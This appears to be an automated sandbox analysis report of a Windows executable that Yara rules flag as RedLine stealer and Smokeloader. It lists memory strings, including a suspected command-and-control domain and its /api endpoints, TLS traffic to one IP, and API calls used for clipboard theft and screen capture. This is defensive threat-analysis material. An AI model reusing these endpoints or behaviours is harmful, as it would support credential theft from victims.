Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.1775886728.0000000002B27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762316213.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748819619.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764065027.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763297825.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749127484.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762684791.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725431973.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748819619.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1795851667.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1775886728.0000000002B18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1790419957.0000000002B1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032635676.0000000002B31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763621204.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/
Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765200814.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762484682.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765856289.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763621204.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764765677.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765654147.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763071930.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765375186.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763297825.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/:
Source: file.exe, 00000000.00000003.1727378356.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725431973.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1726189122.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/_V
Source: file.exe, 00000000.00000003.1775886728.0000000002B27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748819619.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1821948107.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749127484.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725431973.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1795851667.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032635676.0000000002B31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1795730443.0000000002B31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1776499014.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1724926096.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1775926107.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032417589.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/api
Source: file.exe, 00000000.00000003.1822068853.0000000004F22000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2033139643.0000000004F24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/apicu
Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765200814.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762484682.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765856289.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763621204.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764765677.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765654147.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763071930.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765375186.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763297825.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/apili
Source: file.exe, 00000000.00000003.1795851667.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1795730443.0000000002B31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/l
Source: file.exe, 00000000.00000003.1748819619.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749261230.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop/oVrc:
Source: file.exe, 00000000.00000003.1775926107.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop:4
Source: file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765200814.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762484682.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748819619.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738900570.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765856289.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763621204.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749261230.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764765677.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765654147.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763071930.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765375186.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763297825.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shop:443/api
Source: file.exe, 00000000.00000003.1738900570.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shopcF2
Source: file.exe, 00000000.00000003.1738900570.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stationacutwo.shopnF2
Source: file.exe, 00000000.00000003.1726908542.0000000004F7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: file.exe, 00000000.00000003.1750632597.0000000005045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1750632597.0000000005045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1726908542.0000000004F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000003.1726908542.0000000004F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1750632597.0000000005045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000003.1750632597.0000000005045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000003.1750632597.0000000005045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.1750632597.0000000005045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1750632597.0000000005045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0042E590 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_0042E590

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0042E590 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_0042E590

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0042EA70 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

0_2_0042EA70

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2032358738.0000000002A61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041718B	0_2_0041718B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00422290	0_2_00422290
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00416C48	0_2_00416C48
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405460	0_2_00405460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00420CED	0_2_00420CED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00421570	0_2_00421570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00417D08	0_2_00417D08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B630	0_2_0043B630
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040105C	0_2_0040105C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042B8F8	0_2_0042B8F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043A090	0_2_0043A090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B900	0_2_0043B900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00425920	0_2_00425920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004369D0	0_2_004369D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004089E0	0_2_004089E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00433980	0_2_00433980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004399A0	0_2_004399A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404A50	0_2_00404A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00422AC1	0_2_00422AC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00423354	0_2_00423354
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407310	0_2_00407310
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00421C19	0_2_00421C19
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043BC30	0_2_0043BC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043A480	0_2_0043A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00421C8F	0_2_00421C8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406D00	0_2_00406D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040FDA0	0_2_0040FDA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00439E00	0_2_00439E00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004096C0	0_2_004096C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041D75D	0_2_0041D75D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403F00	0_2_00403F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00439F10	0_2_00439F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405F30	0_2_00405F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041FF85	0_2_0041FF85
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401FA0	0_2_00401FA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043E56C7	0_2_043E56C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_044017D7	0_2_044017D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043F0007	0_2_043F0007
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043E4167	0_2_043E4167
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043E6197	0_2_043E6197
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_044003F4	0_2_044003F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04416C37	0_2_04416C37
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043E8C47	0_2_043E8C47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043E4CB7	0_2_043E4CB7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0441BE97	0_2_0441BE97
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04402F17	0_2_04402F17
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043E6F67	0_2_043E6F67
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043F7F91	0_2_043F7F91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0441B897	0_2_0441B897
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_043E9927	0_2_043E9927
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0440BB5F	0_2_0440BB5F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0441BB67	0_2_0441BB67
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04413BE7	0_2_04413BE7

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 043F0197 appears 142 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 043E9607 appears 70 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 004093A0 appears 44 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0040FF30 appears 142 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 1568

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2032358738.0000000002A61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02A626D6 CreateToolhelp32Snapshot,Module32First,

0_2_02A626D6

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0042A44A CoCreateInstance,

0_2_0042A44A

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3696

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a638f05c-eeab-4935-b203-dd9ffa2074ca

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.1727142338.0000000004F54000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 1568

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
